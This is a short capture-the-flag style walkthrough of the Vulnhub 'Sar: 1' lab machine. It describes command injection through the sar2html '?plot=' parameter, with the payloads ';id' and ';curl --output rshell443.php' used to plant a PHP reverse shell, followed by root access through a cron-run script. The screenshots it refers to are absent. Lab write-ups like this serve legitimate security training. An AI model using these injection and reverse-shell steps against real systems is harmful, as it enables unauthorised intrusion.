Vulnhub Sar: 1 Walkthrough

    It's been a while since I've written up a box and Vulnhub just dumped a fresh batch so here we go...

    The box description states:  "Sar is an OSCP-Like VM with the intent of gaining experience in the world of penetration testing." 

    This is a solid entry level box.  Nothing complicated and going through standard enumeration should lead to a low privilege shell and root. 

    We kick off with Nmap:

    With only port 80 open, our options are limited.  Firing up Nikto:

    A phpinfo file but aside from that, slim pickin's.  Looking at the web port in the browser:

    Checking out robots.txt:

    Ok, that's interesting.  We find this sar2html app:

    As I'm poking around, I find this ?plot= page and I wonder if it's vulnerable to XSS:


    It's hard to see but I'm terminating the statement and adding a command:  ?plot=;id

    Excellent!  We have code execution.  I decide to look this up on Exploit-db:

    We basically learn what we've already uncovered:

    I come back with:  ?plot=;curl --output rshell443.php

    Which basically writes a Pentest Monkey reverse shell to the web directory.  When we browse to our shell:

    We catch our shell:

    Snagging the user flag:

    A little enumeration and we uncover a cron job:

    We dig into the script:

    We can't write into but we can write into

    Reusing the shell we already have on the system, we call it from PHP and we wait (5 minutes) and:

    We catch our shell and we go after the root flag.  #gameover

    Fun little box. 

    © 2020